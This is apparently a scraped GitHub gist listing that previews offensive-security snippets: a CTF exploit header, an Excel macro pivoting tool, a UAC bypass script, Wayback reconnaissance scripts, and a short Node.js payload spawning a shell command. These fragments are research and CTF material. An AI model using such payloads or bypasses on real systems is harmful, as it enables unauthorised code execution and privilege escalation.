Julian Horoszkiewicz ewilded
🌴
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Exploit for "ragnarok" of HITCON CTF 2017. | |
| # | |
| # Bug: | |
| # ---- | |
| # In Odin::add_weapon, the following line of code is executed: | |
| # | |
| # cast_spell(shared_ptr<Figure>(this)); | |
| # |
enigma0x3
/ Invoke-ExcelMacroPivot.ps1
Created
September 11, 2017 14:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ExcelMacroPivot{ | |
| <# | |
| .AUTHOR | |
| Matt Nelson (@enigma0x3) | |
| .SYNOPSIS | |
| Pivots to a remote host by using an Excel macro and Excel's COM object | |
| .PARAMETER Target | |
| Remote host to pivot to | |
| .PARAMETER RemoteDocumentPath | |
| Local path on the remote host where the payload resides |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
lanmaster53
/ pyscripter-snippets.py
Last active
September 19, 2025 13:14
Burp Python Scripter scripts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Moved to https://github.com/lanmaster53/pyscripter-er/tree/master/snippets |
mhmdiaa
/ waybackurls.py
Last active
December 6, 2025 20:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
mhmdiaa
/ waybackrobots.py
Last active
November 19, 2025 09:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
x0rz
/ eqgrp_services_lookup.ps1
Created
April 18, 2017 16:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "[+] Getting \system\\currentcontrolset\\services" | |
| $raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services | select Name | |
| $services = @() | |
| foreach ($srv in $raw_services) { | |
| $shortname = "$srv".Split("\")[-1] | |
| $shortname = $shortname.Substring(0,$shortname.Length-1) | |
| $services += $shortname | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Process = process.binding('process_wrap').Process; | |
| var proc = new Process(); | |
| proc.onexit = function(a,b) {}; | |
| var env = process.env; | |
| var env_ = []; | |
| for (var key in env) env_.push(key+'='+env[key]); | |
| proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); |
mattifestation
/ UACBypass.ps1
Last active
December 29, 2025 08:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-UACBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
| Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CloseFile | |
| CreateFile | |
| CreateFileMapping | |
| DeviceIoControl | |
| FileSystemControl | |
| FlushBuffersFile | |
| Load Image | |
| LockFile | |
| NotifyChangeDirectory | |
| Process Create |